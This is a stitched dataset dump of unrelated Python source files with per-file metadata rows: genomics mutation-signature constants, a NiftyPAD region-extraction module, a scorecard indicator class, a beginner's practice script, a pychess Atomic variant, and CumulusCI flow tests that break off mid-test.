GENES_AGG_FILE = os.path.join(OBJ_DIR, GENES_AGG_FILENAME)
SAMPLES_AGG_FILE = os.path.join(OBJ_DIR, SAMPLES_AGG_FILENAME)
ONCOTREE_FILE = os.path.join(OBJ_DIR, ONCOTREE_FILENAME)
PROJ_TO_SIGS_FILE = os.path.join(OBJ_DIR, PROJ_TO_SIGS_FILENAME)
EXPLOSIG_CONNECT_HOST = 'explosig_connect:8200'
CAT_TYPES = [
'SBS_96',
'DBS_78',
'INDEL_Alexandrov2018_83'
]
MUT_TYPES = [
'SBS',
'DBS',
'INDEL'
]
MUT_TYPE_MAP = {
'SBS': 'SBS_96',
'DBS': 'DBS_78',
'INDEL': 'INDEL_Alexandrov2018_83'
}
CAT_TYPE_MAP = dict([(val, key) for key, val in MUT_TYPE_MAP.items()])
# Regular Expressions
CHROMOSOME_RE = r'^(X|Y|M|[1-9]|1[0-9]|2[0-2])$'
# Column names for extended mutation tables
PATIENT = 'Patient'
SAMPLE = 'Sample'
CANCER_TYPE = 'Cancer Type'
PROVENANCE = 'Provenance'
COHORT = 'Cohort'
CHR = 'Chromosome'
POS_START = 'Start Position'
POS_END = 'End Position'
REF = 'Reference Sequence'
VAR = 'Variant Sequence'
GSTRAND = 'Genomic Strand'
SEQ_TYPE = 'Sequencing Strategy'
MUT_TYPE = 'Mutation Type'
ASSEMBLY = 'Assembly Version'
MUT_CLASS = 'Mutation Classification'
GENE_SYMBOL = "Gene Symbol"
FPRIME = "5' Flanking Bases"
TPRIME = "3' Flanking Bases"
TSTRAND = 'Transcriptional Strand'
MUT_DIST = 'Distance to Previous Mutation'
NEAREST_MUT = 'Distance to Nearest Mutation'
MUT_DIST_ROLLING_MEAN = 'Rolling Mean of 6 Mutation Distances'
KATAEGIS = 'Kataegis'
# Special clinical variables
ICD_O_3_SITE_CODE = 'ICD-O-3 Site Code'
ICD_O_3_SITE_DESC = 'ICD-O-3 Site Description'
ICD_O_3_HISTOLOGY_CODE = 'ICD-O-3 Histology Code'
ICD_O_3_HISTOLOGY_DESC = 'ICD-O-3 Histology Description'
SURVIVAL_DAYS_TO_DEATH = 'Days to Death'
SURVIVAL_DAYS_TO_LAST_FOLLOWUP = 'Days to Last Followup'
# Column names for gene expression tables
GENE_EXPRESSION_RNA_SEQ_MRNA_Z = 'RNA Seq v2 mRNA median Zscore'
CHROMOSOMES = {
'1': 249250621,
'2': 243199373,
'3': 198022430,
'4': 191154276,
'5': 180915260,
'6': 171115067,
'7': 159138663,
'8': 146364022,
'9': 141213431,
'10': 135534747,
'11': 135006516,
'12': 133851895,
'13': 115169878,
'14': 107349540,
'15': 102531392,
'16': 90354753,
'17': 81195210,
'18': 78077248,
'19': 59128983,
'20': 63025520,
'21': 48129895,
'22': 51304566,
'X': 155270560,
'Y': 59373566,
'M': 16571
}
class MUT_CLASS_VALS(Enum):
SILENT = "Silent"
MISSENSE = "Missense"
FRAMESHIFT = "Frameshift"
SPLICE_SITE = "Splice Site"
NONSENSE = "Nonsense"
IN_FRAME_INDEL = "in-frame indel"
OTHER = "Other mutation"
NONSTOP = "Nonstop"
TRANSLATION_START_SITE="Translation Start Site"
# Signatures columns
META_COL_SIG = 'Signature'
META_COL_ONCOTREE_CODE = 'Oncotree Code'
META_COL_CANCER_TYPE = 'Cancer Type'
META_COL_CAT_TYPE = 'Category Type'
META_COL_DESCRIPTION = 'Description'
META_COL_INDEX = 'Index'
META_COL_SIG_GROUP = 'Signature Group'
META_COL_PUBLICATION = 'Publication'
META_COL_PATH_SIGS_META = 'Path to Meta File'
META_COL_PATH_SIGS_DATA = 'Path to Signatures {cat_type} File'
META_COL_PATH_SIGS_CANCER_TYPE_MAP = 'Path to Cancer Type Map File'
META_COL_PATH_SIGS_DATA_LIST = [META_COL_PATH_SIGS_DATA.format(cat_type=val) for val in CAT_TYPES]
META_SIGS_FILE_COLS = [
META_COL_PATH_SIGS_META,
META_COL_PATH_SIGS_CANCER_TYPE_MAP
] + META_COL_PATH_SIGS_DATA_LIST
META_SIGS_COLS = [
META_COL_SIG,
META_COL_DESCRIPTION,
META_COL_INDEX,
META_COL_CAT_TYPE
]
META_CANCER_TYPE_MAP_COLS = [
META_COL_SIG,
META_COL_ONCOTREE_CODE,
META_COL_CANCER_TYPE,
META_COL_CAT_TYPE
]
# Mutation data columns
META_COL_PROJ = 'Project'
META_COL_PROJ_SOURCE = 'Project Source'
META_COL_PROJ_NAME = 'Project Name'
META_COL_PATH_MUTS_COUNTS = 'Path to Counts {cat_type} File'
META_COL_PATH_CLINICAL = 'Path to Clinical File'
META_COL_PATH_SAMPLES = 'Path to Samples File'
META_COL_PATH_GENE_MUT = 'Path to Gene Mutation File'
META_COL_PATH_GENE_EXP = 'Path to Gene Expression File'
META_COL_PATH_GENE_CNA = 'Path to Gene CNA File'
META_COL_PATH_MUTS_COUNTS_LIST = [META_COL_PATH_MUTS_COUNTS.format(cat_type=val) for val in CAT_TYPES]
META_DATA_FILE_COLS = [
META_COL_PATH_CLINICAL,
META_COL_PATH_SAMPLES,
META_COL_PATH_GENE_MUT,
META_COL_PATH_GENE_EXP,
META_COL_PATH_GENE_CNA
] + META_COL_PATH_MUTS_COUNTS_LIST
# Pathways data columns
META_COL_PATHWAYS_GROUP = 'Pathways Group'
META_COL_PATH_PATHWAYS = 'Path to Pathways File'
META_PATHWAYS_FILE_COLS = [
META_COL_PATH_PATHWAYS
]
# Clinical variables columns
META_COL_CLINICAL_COL = 'Clinical Column'
META_COL_CLINICAL_SCALE_TYPE = 'Scale Type'
META_COL_CLINICAL_EXTENT = 'Extent'
META_COL_CLINICAL_VALUE = 'Value'
# Tri-counts data columns
META_COL_TRICOUNTS_METHOD = 'Method'
META_COL_PATH_TRICOUNTS = 'Path to Trinucleotide Counts File'
META_TRICOUNTS_FILE_COLS = [
META_COL_PATH_TRICOUNTS
] | en | 0.396747 | # Regular Expressions # Column names for extended mutation tables # Special clinical variables # Column names for gene expression tables # Signatures columns # Mutation data columns # Pathways data columns # Clinical variables columns # Tri-counts data columns | 1.916264 | 2 |
niftypad/image_process/regions.py | JJiao/NiftyPAD | 0 | 6632467 | __author__ = '<NAME>'
__email__ = "<EMAIL>"
import numpy as np
import nibabel as nib
def extract_regional_values(image, parcellation, labels):
idx = labels_to_index(parcellation, labels)
regional_values = np.mean(image[idx, ], axis=0)
return regional_values
def labels_to_index(parcellation, labels):
parcellation = np.squeeze(parcellation)
idx = np.zeros(parcellation.shape, dtype='bool')
for i in range(len(labels)):
idx = np.logical_or(idx, parcellation == labels[i])
return idx
def extract_regional_values_image_file(image_file, parcellation_file):
image = nib.load(image_file)
image_data = image.get_data()
n_frames = 1
if image_data.ndim == 4:
n_frames = image_data.shape[-1]
parcellation_img = nib.load(parcellation_file)
parcellation = parcellation_img.get_data()
regions_label = np.unique(parcellation)
regions_data = np.zeros((regions_label.size, n_frames))
regions_data = np.squeeze(regions_data)
for i in range(regions_label.size):
regions_data[i] = extract_regional_values(image_data, parcellation, [regions_label[i]])
return regions_data, regions_label
| __author__ = '<NAME>'
__email__ = "<EMAIL>"
import numpy as np
import nibabel as nib
def extract_regional_values(image, parcellation, labels):
idx = labels_to_index(parcellation, labels)
regional_values = np.mean(image[idx, ], axis=0)
return regional_values
def labels_to_index(parcellation, labels):
parcellation = np.squeeze(parcellation)
idx = np.zeros(parcellation.shape, dtype='bool')
for i in range(len(labels)):
idx = np.logical_or(idx, parcellation == labels[i])
return idx
def extract_regional_values_image_file(image_file, parcellation_file):
image = nib.load(image_file)
image_data = image.get_data()
n_frames = 1
if image_data.ndim == 4:
n_frames = image_data.shape[-1]
parcellation_img = nib.load(parcellation_file)
parcellation = parcellation_img.get_data()
regions_label = np.unique(parcellation)
regions_data = np.zeros((regions_label.size, n_frames))
regions_data = np.squeeze(regions_data)
for i in range(regions_label.size):
regions_data[i] = extract_regional_values(image_data, parcellation, [regions_label[i]])
return regions_data, regions_label
| none | 1 | 2.540958 | 3 |
|
scorecard/profile_data/indicators/series.py | Code4SA/municipal-data-api | 0 | 6632468 | <filename>scorecard/profile_data/indicators/series.py
class SeriesIndicator():
@classmethod
def get_muni_specifics(cls, api_data):
results = api_data.results
years = api_data.years
return {
"result_type": cls.result_type,
"values": cls.get_values(years, results),
"ref": api_data.references[cls.reference],
"last_year": years[0] if len(years) > 0 else None,
"formula": cls.formula,
"formula_v2": cls.formula_v2,
}
| <filename>scorecard/profile_data/indicators/series.py
class SeriesIndicator():
@classmethod
def get_muni_specifics(cls, api_data):
results = api_data.results
years = api_data.years
return {
"result_type": cls.result_type,
"values": cls.get_values(years, results),
"ref": api_data.references[cls.reference],
"last_year": years[0] if len(years) > 0 else None,
"formula": cls.formula,
"formula_v2": cls.formula_v2,
}
| none | 1 | 2.563543 | 3 |
|
testGroup.py | Zoushangjie/python-code | 0 | 6632469 | import numpy as np
if 0:
number = [1, 2, 3]
print(number)
number.append(9)
print(number)
number.append("hhh")
print(number)
number.extend([5, 3, 6, 8])
print(number)
number.insert(0, "StartsHere")
print(number)
number.remove(3)
print(number)
number.remove(3)
print(number)
del number[2]
print(number)
a = number.pop()
print(a)
b = number.pop(2)
print(b)
c = number.pop(2)
print(c)
if(0):
num=[5,"bulshit",4,3,7,9,6,0,"fuckyall"]
a=num.pop()
b=num.pop()
c=num.pop()
print(a)
print(b)
print(c)
d=num.pop(1)
print(d)
#The next block is the demon of list slicing
if(0):
yo=[1,2,3,"you are so nice",5,"love you!"]
q=yo[:2]
print(q)
p=yo[0:2]
print(p)
print(yo[1:2]) #"start and print from here and stop before the next No."
print(yo[2:]) # Ah, actually, this method is "start and print from here until the last"
# Now I am going to add the third parameter: step distnce--bu chang in Chinese
print(yo[1:5:3])
print(yo[1:5:2]) # start at [1] and stop before [5], two "steps" as a step. If the "window" is out of the list, there will be no output at that step
# Duang, there's a special method: reverse the list
print(yo[::-1])
if(0):
# fen pian copy
list1=[1,2,9,3,7]
list2=list1[:] # copy and preserve
list3=list1
list1.sort()
print(list1)
print(list2)
print(list3)
# tuple
if(0):
temp=(1)
print(type(temp))
temp=(1,)
type(temp)
print(type(temp))
# the key of tuple is ","
temp=("jj","yy","ee")
temp=temp[:2]+("mua",)+temp[2:]
print(temp)
temp=temp[:2]+temp[3:]
print(temp)
# add and delet
#del temp
#print(temp)
str1="I love you my daring"
str1=str1[:10]
print(str1)
print(str1[5])
str2="I love you my daring"
str2=str2.replace("daring","girl")
print(str2)
if(0):
list4=[1,3,5,6,4,8,7]#"a","Bioinformatics","paper","APS","CityU","Accept"
temp = list4[0]
for each in list4:
if each>temp:
temp=each
print(temp)
if(0):
def multi(a,b,c,d):
"""This function can do the formulation a+b*c-d"""
print(a+b*c-d)
multi(12,34,56,78)
print(multi.__doc__) # doc for the function
#key word parameter and mo ren parameter
def nutri(name="protein",word="good"):
print(name+" "+word)
print(nutri())
print(nutri("sugar","less"))
def changeAble(*params):
print("have %d parameters" % len(params))
print("the second param is:", params[1]) # be care of here. if params are int, don't use '+', use ','
print(changeAble("I",'love','you','babe'))
# release package
a=[1,2,3,4,5]
print(changeAble(*a))
if(0):
def discount(price,rate):
final_price = price * rate
return final_price
original_price = float(input('please enter the ori price:'))
rate = float(input('please enter discount:'))/100
newprice = discount(original_price,rate)
print('After discount is:', newprice)
if (0):
def Total_price(numOfGoods):
original_price = float(input('Please enter the original price:'))
disccount = float(input('Enter discount:')) / 10
def single_price(origin_Single_price,rate):
final_price = origin_Single_price*rate
return final_price
total_price = single_price(original_price, disccount) * numOfGoods
return total_price
numOfGoods=float(input('Enter number of goods:'))
total=Total_price(numOfGoods)
print(total)
if (0):
student=['zoushangjie','xiaopengyou']
programme=['Genomics and bioinformatics in CUHK','666']
print(programme.index('Genomics and bioinformatics in CUHK'))
print("zoushangjie:", programme[student.index('zoushangjie')])
dict_master={'zoushangjie':'Genomics and bioinformatics in CUHK',"lin":'PKU'}
print(dict_master['zoushangjie'])
dict_master[1]='TSU'
print(dict_master)
dict_master['Lin']='TSU'
print(dict_master)
dict_master.update(Lin='PKU Medical') # No '' on key !!??
print(dict_master)
if (0):
list1=[1,1,2,4,5,77,8,77]
print(list1)
list1=list(set(list1)) # set can remove repeated values
print(list1) | import numpy as np
if 0:
number = [1, 2, 3]
print(number)
number.append(9)
print(number)
number.append("hhh")
print(number)
number.extend([5, 3, 6, 8])
print(number)
number.insert(0, "StartsHere")
print(number)
number.remove(3)
print(number)
number.remove(3)
print(number)
del number[2]
print(number)
a = number.pop()
print(a)
b = number.pop(2)
print(b)
c = number.pop(2)
print(c)
if(0):
num=[5,"bulshit",4,3,7,9,6,0,"fuckyall"]
a=num.pop()
b=num.pop()
c=num.pop()
print(a)
print(b)
print(c)
d=num.pop(1)
print(d)
#The next block is the demon of list slicing
if(0):
yo=[1,2,3,"you are so nice",5,"love you!"]
q=yo[:2]
print(q)
p=yo[0:2]
print(p)
print(yo[1:2]) #"start and print from here and stop before the next No."
print(yo[2:]) # Ah, actually, this method is "start and print from here until the last"
# Now I am going to add the third parameter: step distnce--bu chang in Chinese
print(yo[1:5:3])
print(yo[1:5:2]) # start at [1] and stop before [5], two "steps" as a step. If the "window" is out of the list, there will be no output at that step
# Duang, there's a special method: reverse the list
print(yo[::-1])
if(0):
# fen pian copy
list1=[1,2,9,3,7]
list2=list1[:] # copy and preserve
list3=list1
list1.sort()
print(list1)
print(list2)
print(list3)
# tuple
if(0):
temp=(1)
print(type(temp))
temp=(1,)
type(temp)
print(type(temp))
# the key of tuple is ","
temp=("jj","yy","ee")
temp=temp[:2]+("mua",)+temp[2:]
print(temp)
temp=temp[:2]+temp[3:]
print(temp)
# add and delet
#del temp
#print(temp)
str1="I love you my daring"
str1=str1[:10]
print(str1)
print(str1[5])
str2="I love you my daring"
str2=str2.replace("daring","girl")
print(str2)
if(0):
list4=[1,3,5,6,4,8,7]#"a","Bioinformatics","paper","APS","CityU","Accept"
temp = list4[0]
for each in list4:
if each>temp:
temp=each
print(temp)
if(0):
def multi(a,b,c,d):
"""This function can do the formulation a+b*c-d"""
print(a+b*c-d)
multi(12,34,56,78)
print(multi.__doc__) # doc for the function
#key word parameter and mo ren parameter
def nutri(name="protein",word="good"):
print(name+" "+word)
print(nutri())
print(nutri("sugar","less"))
def changeAble(*params):
print("have %d parameters" % len(params))
print("the second param is:", params[1]) # be care of here. if params are int, don't use '+', use ','
print(changeAble("I",'love','you','babe'))
# release package
a=[1,2,3,4,5]
print(changeAble(*a))
if(0):
def discount(price,rate):
final_price = price * rate
return final_price
original_price = float(input('please enter the ori price:'))
rate = float(input('please enter discount:'))/100
newprice = discount(original_price,rate)
print('After discount is:', newprice)
if (0):
def Total_price(numOfGoods):
original_price = float(input('Please enter the original price:'))
disccount = float(input('Enter discount:')) / 10
def single_price(origin_Single_price,rate):
final_price = origin_Single_price*rate
return final_price
total_price = single_price(original_price, disccount) * numOfGoods
return total_price
numOfGoods=float(input('Enter number of goods:'))
total=Total_price(numOfGoods)
print(total)
if (0):
student=['zoushangjie','xiaopengyou']
programme=['Genomics and bioinformatics in CUHK','666']
print(programme.index('Genomics and bioinformatics in CUHK'))
print("zoushangjie:", programme[student.index('zoushangjie')])
dict_master={'zoushangjie':'Genomics and bioinformatics in CUHK',"lin":'PKU'}
print(dict_master['zoushangjie'])
dict_master[1]='TSU'
print(dict_master)
dict_master['Lin']='TSU'
print(dict_master)
dict_master.update(Lin='PKU Medical') # No '' on key !!??
print(dict_master)
if (0):
list1=[1,1,2,4,5,77,8,77]
print(list1)
list1=list(set(list1)) # set can remove repeated values
print(list1) | en | 0.825459 | #The next block is the demon of list slicing #"start and print from here and stop before the next No." # Ah, actually, this method is "start and print from here until the last" # Now I am going to add the third parameter: step distnce--bu chang in Chinese # start at [1] and stop before [5], two "steps" as a step. If the "window" is out of the list, there will be no output at that step # Duang, there's a special method: reverse the list # fen pian copy # copy and preserve # tuple # the key of tuple is "," # add and delet #del temp #print(temp) #"a","Bioinformatics","paper","APS","CityU","Accept" This function can do the formulation a+b*c-d # doc for the function #key word parameter and mo ren parameter # be care of here. if params are int, don't use '+', use ',' # release package # No '' on key !!?? # set can remove repeated values | 4.25113 | 4 |
pychess/Variants/atomic.py | jacobchrismarsh/chess_senior_project | 0 | 6632470 | # Atomic Chess
from pychess.Utils.const import (
VARIANTS_OTHER_NONSTANDARD,
KING,
ATOMICCHESS,
ENPASSANT,
B8,
E1,
)
from pychess.Utils.Board import Board
from pychess.Utils.Cord import Cord
from pychess.Utils.Move import Move
from pychess.Utils.lutils.bitboard import iterBits
from pychess.Utils.lutils.ldata import moveArray
class AtomicBoard(Board):
variant = ATOMICCHESS
__desc__ = _("FICS atomic: http://www.freechess.org/Help/HelpFiles/atomic.html")
name = _("Atomic")
cecp_name = "atomic"
need_initial_board = False
standard_rules = False
variant_group = VARIANTS_OTHER_NONSTANDARD
def cordsAround(cord):
kingMoves = moveArray[KING]
for co_ord in iterBits(kingMoves[cord.cord]):
yield Cord(co_ord)
def piecesAround(board, cord):
kingMoves = moveArray[KING]
friends = board.friends[board.color]
for co_ord in iterBits(kingMoves[cord] & friends):
yield co_ord, board.arBoard[co_ord], board.color
enemies = board.friends[1 - board.color]
for co_ord in iterBits(kingMoves[cord] & enemies):
yield co_ord, board.arBoard[co_ord], 1 - board.color
def kingExplode(board, move, color):
tcord = move & 63
# fcord = (move >> 6) & 63
flag = move >> 12
if board.arBoard[tcord] or flag == ENPASSANT:
for acord, apiece, acolor in piecesAround(board, tcord):
if apiece == KING and acolor == color:
return True
return False
if __name__ == "__main__":
FEN = "rnbqkbnr/ppp1pppp/8/8/8/8/PPPPPPPP/RNBQKBNR b KQkq - 0 1"
atomic_board = AtomicBoard(FEN)
print(atomic_board.board.__repr__())
for acord, apiece, acolor in piecesAround(atomic_board.board, B8):
print(acord, apiece, acolor)
for acord, apiece, acolor in piecesAround(atomic_board.board, E1):
print(acord, apiece, acolor)
from pychess.Utils.lutils.lmove import parseAN
atomic_board = atomic_board.move(Move(parseAN(atomic_board.board, "d8d2")))
print(atomic_board.board.__repr__())
print(atomic_board.board.pieceCount)
atomic_board.board.popMove()
print(atomic_board.board.__repr__())
print(atomic_board.board.pieceCount)
| # Atomic Chess
from pychess.Utils.const import (
VARIANTS_OTHER_NONSTANDARD,
KING,
ATOMICCHESS,
ENPASSANT,
B8,
E1,
)
from pychess.Utils.Board import Board
from pychess.Utils.Cord import Cord
from pychess.Utils.Move import Move
from pychess.Utils.lutils.bitboard import iterBits
from pychess.Utils.lutils.ldata import moveArray
class AtomicBoard(Board):
variant = ATOMICCHESS
__desc__ = _("FICS atomic: http://www.freechess.org/Help/HelpFiles/atomic.html")
name = _("Atomic")
cecp_name = "atomic"
need_initial_board = False
standard_rules = False
variant_group = VARIANTS_OTHER_NONSTANDARD
def cordsAround(cord):
kingMoves = moveArray[KING]
for co_ord in iterBits(kingMoves[cord.cord]):
yield Cord(co_ord)
def piecesAround(board, cord):
kingMoves = moveArray[KING]
friends = board.friends[board.color]
for co_ord in iterBits(kingMoves[cord] & friends):
yield co_ord, board.arBoard[co_ord], board.color
enemies = board.friends[1 - board.color]
for co_ord in iterBits(kingMoves[cord] & enemies):
yield co_ord, board.arBoard[co_ord], 1 - board.color
def kingExplode(board, move, color):
tcord = move & 63
# fcord = (move >> 6) & 63
flag = move >> 12
if board.arBoard[tcord] or flag == ENPASSANT:
for acord, apiece, acolor in piecesAround(board, tcord):
if apiece == KING and acolor == color:
return True
return False
if __name__ == "__main__":
FEN = "rnbqkbnr/ppp1pppp/8/8/8/8/PPPPPPPP/RNBQKBNR b KQkq - 0 1"
atomic_board = AtomicBoard(FEN)
print(atomic_board.board.__repr__())
for acord, apiece, acolor in piecesAround(atomic_board.board, B8):
print(acord, apiece, acolor)
for acord, apiece, acolor in piecesAround(atomic_board.board, E1):
print(acord, apiece, acolor)
from pychess.Utils.lutils.lmove import parseAN
atomic_board = atomic_board.move(Move(parseAN(atomic_board.board, "d8d2")))
print(atomic_board.board.__repr__())
print(atomic_board.board.pieceCount)
atomic_board.board.popMove()
print(atomic_board.board.__repr__())
print(atomic_board.board.pieceCount)
| en | 0.763947 | # Atomic Chess # fcord = (move >> 6) & 63 | 2.561276 | 3 |
cumulusci/core/tests/test_flows.py | 1handclapping/CumulusCI | 0 | 6632471 | <reponame>1handclapping/CumulusCI<gh_stars>0
""" Tests for the Flow engine """
import unittest
import logging
import mock
from collections import Callable
from cumulusci.core.flows import BaseFlow
from cumulusci.core.tasks import BaseTask
from cumulusci.core.config import FlowConfig
from cumulusci.core.config import OrgConfig
from cumulusci.core.exceptions import FlowConfigError
from cumulusci.core.exceptions import FlowInfiniteLoopError
from cumulusci.core.exceptions import FlowNotReadyError
from cumulusci.core.exceptions import TaskNotFoundError
from cumulusci.core.tests.utils import MockLoggingHandler
from cumulusci.tests.util import create_project_config
import cumulusci.core
ORG_ID = "00D000000000001"
class _TaskReturnsStuff(BaseTask):
def _run_task(self):
self.return_values = {"name": "supername"}
class _TaskResponseName(BaseTask):
task_options = {"response": {"description": "the response to print"}}
def _run_task(self):
return self.options["response"]
class _TaskRaisesException(BaseTask):
task_options = {
"exception": {"description": "The exception to raise"},
"message": {"description": "The exception message"},
}
def _run_task(self):
raise self.options["exception"](self.options["message"])
class _SfdcTask(BaseTask):
salesforce_task = True
def _run_task(self):
return -1
@mock.patch("cumulusci.core.flows.BaseFlow._init_org")
class TestBaseFlow(unittest.TestCase):
""" Tests the expectations of a BaseFlow caller """
@classmethod
def setUpClass(cls):
super(TestBaseFlow, cls).setUpClass()
logger = logging.getLogger(cumulusci.core.__name__)
logger.setLevel(logging.DEBUG)
cls._flow_log_handler = MockLoggingHandler(logging.DEBUG)
logger.addHandler(cls._flow_log_handler)
def setUp(self):
self.project_config = create_project_config("TestOwner", "TestRepo")
self.project_config.config["tasks"] = {
"pass_name": {
"description": "Pass the name",
"class_path": "cumulusci.core.tests.test_flows._TaskReturnsStuff",
},
"name_response": {
"description": "Pass the name",
"class_path": "cumulusci.core.tests.test_flows._TaskResponseName",
},
"raise_exception": {
"description": "Raises an exception",
"class_path": "cumulusci.core.tests.test_flows._TaskRaisesException",
"options": {
"exception": Exception,
"message": "Test raised exception as expected",
},
},
"sfdc_task": {
"description": "An sfdc task",
"class_path": "cumulusci.core.tests.test_flows._SfdcTask",
},
}
self.project_config.config["flows"] = {
"nested_flow": {
"description": "A flow that runs inside another flow",
"steps": {1: {"task": "pass_name"}},
},
"nested_flow_2": {
"description": "A flow that runs inside another flow, and calls another flow",
"steps": {1: {"task": "pass_name"}, 2: {"flow": "nested_flow"}},
},
}
self.org_config = OrgConfig(
{"username": "<EMAIL>", "org_id": ORG_ID}, "test"
)
self._flow_log_handler.reset()
self.flow_log = self._flow_log_handler.messages
def test_init(self, mock_class):
""" BaseFlow initializes and offers a logger """
flow_config = FlowConfig({})
mock_class.return_value = None
flow = BaseFlow(self.project_config, flow_config, self.org_config)
self.assertEqual(hasattr(flow, "logger"), True)
def test_is_callable(self, mock_class):
""" BaseFlow exposes itself as a callable for use """
flow_config = FlowConfig({})
flow = BaseFlow(self.project_config, flow_config, self.org_config)
self.assertIsInstance(flow, Callable)
def test_pass_around_values(self, mock_class):
""" A flow's options reach into return values from other tasks. """
mock_class.return_value = None
# instantiate a flow with two tasks
flow_config = FlowConfig(
{
"description": "Run two tasks",
"steps": {
1: {"task": "pass_name"},
2: {
"task": "name_response",
"options": {"response": "^^pass_name.name"},
},
},
}
)
flow = BaseFlow(self.project_config, flow_config, self.org_config)
# run the flow
flow()
# the flow results for the second task should be 'name'
self.assertEqual("supername", flow.step_results[1])
def test_task_options(self, mock_class):
""" A flow can accept task options and pass them to the task. """
mock_class.return_value = None
# instantiate a flow with two tasks
flow_config = FlowConfig(
{
"description": "Run two tasks",
"steps": {1: {"task": "name_response", "options": {"response": "foo"}}},
}
)
flow = BaseFlow(
self.project_config,
flow_config,
self.org_config,
options={"name_response__response": "bar"},
)
# run the flow
flow()
# the flow results for the first task should be 'bar'
self.assertEqual("bar", flow.step_results[0])
def test_skip_kwarg(self, mock_class):
""" A flow can receive during init a list of tasks to skip """
# instantiate a flow with two tasks
flow_config = FlowConfig(
{
"description": "Run two tasks",
"steps": {
1: {"task": "pass_name"},
2: {
"task": "name_response",
"options": {"response": "^^pass_name.name"},
},
},
}
)
flow = BaseFlow(
self.project_config, flow_config, self.org_config, skip=["name_response"]
)
# run the flow
flow()
# the number of tasks in the flow should be 1 instead of 2
self.assertEqual(1, len(flow.step_results))
def test_skip_task_value_none(self, mock_class):
""" A flow skips any tasks whose name is None to allow override via yaml """
# instantiate a flow with two tasks
flow_config = FlowConfig(
{
"description": "Run two tasks",
"steps": {1: {"task": "pass_name"}, 2: {"task": "None"}},
}
)
flow = BaseFlow(
self.project_config, flow_config, self.org_config, skip=["name_response"]
)
# run the flow
flow()
# the number of tasks in the flow should be 1 instead of 2
self.assertEqual(1, len(flow.step_results))
def test_find_step_by_name_no_steps(self, mock_class):
""" Running a flow with no steps throws an error """
# instantiate a flow with two tasks
flow_config = FlowConfig({"description": "Run two tasks"})
flow = BaseFlow(self.project_config, flow_config, self.org_config)
self.assertIsNone(flow._find_step_by_name("task"))
with self.assertRaises(FlowConfigError):
flow()
def test_find_step_by_name_not_first(self, mock_class):
""" The _find_step_by_name method skips tasks that don't exist """
# instantiate a flow with two tasks
flow_config = FlowConfig(
{
"description": "Run two tasks",
"steps": {
1: {"task": "pass_name"},
2: {
"task": "name_response",
"options": {"response": "^^pass_name.name"},
},
},
}
)
flow = BaseFlow(self.project_config, flow_config, self.org_config)
flow()
task = flow._find_step_by_name("name_response")
self.assertEqual(
"cumulusci.core.tests.test_flows._TaskResponseName",
task.task_config.class_path,
)
def test_find_step_by_name__flow(self, mock_class):
flow_config = FlowConfig(
{
"description": "Run two tasks",
"steps": {
1: {"flow": "nested_flow"},
2: {
"task": "name_response",
"options": {
"response": "^^nested_flow.pass_name.name",
"from_flow": "^^nested_flow.name",
},
},
},
}
)
flow = BaseFlow(self.project_config, flow_config, self.org_config)
flow()
step = flow._find_step_by_name("nested_flow")
self.assertIsInstance(step, BaseFlow)
def test_render_task_config_empty_value(self, mock_class):
""" The _render_task_config method skips option values of None """
# instantiate a flow with two tasks
flow_config = FlowConfig(
{
"description": "Run a tasks",
"steps": {1: {"task": "name_response", "options": {"response": None}}},
}
)
flow = BaseFlow(self.project_config, flow_config, self.org_config)
flow()
task = flow._find_step_by_name("name_response")
config = flow._render_task_config(task)
self.assertEqual(["Options:"], config)
def test_task_raises_exception_fail(self, mock_class):
""" A flow aborts when a task raises an exception """
flow_config = FlowConfig(
{"description": "Run a task", "steps": {1: {"task": "raise_exception"}}}
)
flow = BaseFlow(self.project_config, flow_config, self.org_config)
self.assertRaises(Exception, flow)
def test_task_raises_exception_ignore(self, mock_class):
""" A flow continues when a task configured with ignore_failure raises an exception """
flow_config = FlowConfig(
{
"description": "Run a task",
"steps": {
1: {"task": "raise_exception", "ignore_failure": True},
2: {"task": "pass_name"},
},
}
)
flow = BaseFlow(self.project_config, flow_config, self.org_config)
flow()
self.assertEqual(2, len(flow.steps))
def test_call_no_tasks(self, mock_class):
""" A flow with no tasks will have no responses. """
flow_config = FlowConfig({"description": "Run no tasks", "steps": {}})
flow = BaseFlow(self.project_config, flow_config, self.org_config)
flow()
self.assertEqual([], flow.step_return_values)
self.assertEqual([], flow.steps)
def test_call_one_task(self, mock_class):
""" A flow with one task will execute the task """
flow_config = FlowConfig(
{"description": "Run one task", "steps": {1: {"task": "pass_name"}}}
)
flow = BaseFlow(self.project_config, flow_config, self.org_config)
flow()
self.assertTrue(
any("Flow Description: Run one task" in s for s in self.flow_log["info"])
)
self.assertEqual([{"name": "supername"}], flow.step_return_values)
self.assertEqual(1, len(flow.steps))
def test_call_many_tasks(self, mock_class):
""" A flow with many tasks will dispatch each task """
flow_config = FlowConfig(
{
"description": "Run two tasks",
"steps": {1: {"task": "pass_name"}, 2: {"task": "pass_name"}},
}
)
flow = BaseFlow(self.project_config, flow_config, self.org_config)
flow()
self.assertEqual(
[{"name": "supername"}, {"name": "supername"}], flow.step_return_values
)
self.assertEqual(2, len(flow.steps))
def test_call_task_not_found(self, mock_class):
""" A flow with reference to a task that doesn't exist in the
project will throw a TaskNotFoundError """
flow_config = FlowConfig(
{
"description": "Run two tasks",
"steps": {1: {"task": "pass_name"}, 2: {"task": "do_delightulthings"}},
}
)
with self.assertRaises(TaskNotFoundError):
flow = BaseFlow(self.project_config, flow_config, self.org_config)
def test_flow_prints_org_id(self, mock_class):
""" A flow with an org prints the org ID """
flow_config = FlowConfig(
{
"description": "Run two tasks",
"steps": {1: {"task": "pass_name"}, 2: {"task": "pass_name"}},
}
)
flow = BaseFlow(self.project_config, flow_config, self.org_config)
flow()
org_id_logs = [s for s in self.flow_log["info"] if ORG_ID in s]
self.assertEqual(1, len(org_id_logs))
def test_flow_no_org_no_org_id(self, mock_class):
""" A flow without an org does not print the org ID """
flow_config = FlowConfig(
{
"description": "Run two tasks",
"steps": {1: {"task": "pass_name"}, 2: {"task": "pass_name"}},
}
)
flow = BaseFlow(self.project_config, flow_config, None)
flow()
self.assertFalse(any(ORG_ID in s for s in self.flow_log["info"]))
def test_flow_prints_org_id_once_only(self, mock_class):
""" A flow with sf tasks prints the org ID only once."""
flow_config = FlowConfig(
{
"description": "Run two tasks",
"steps": {1: {"task": "sfdc_task"}, 2: {"task": "sfdc_task"}},
}
)
flow = BaseFlow(self.project_config, flow_config, self.org_config)
flow()
org_id_logs = [s for s in self.flow_log["info"] if ORG_ID in s]
self.assertEqual(1, len(org_id_logs))
def test_nested_flow(self, mock_class):
""" Flows can run inside other flows """
flow_config = FlowConfig(
{
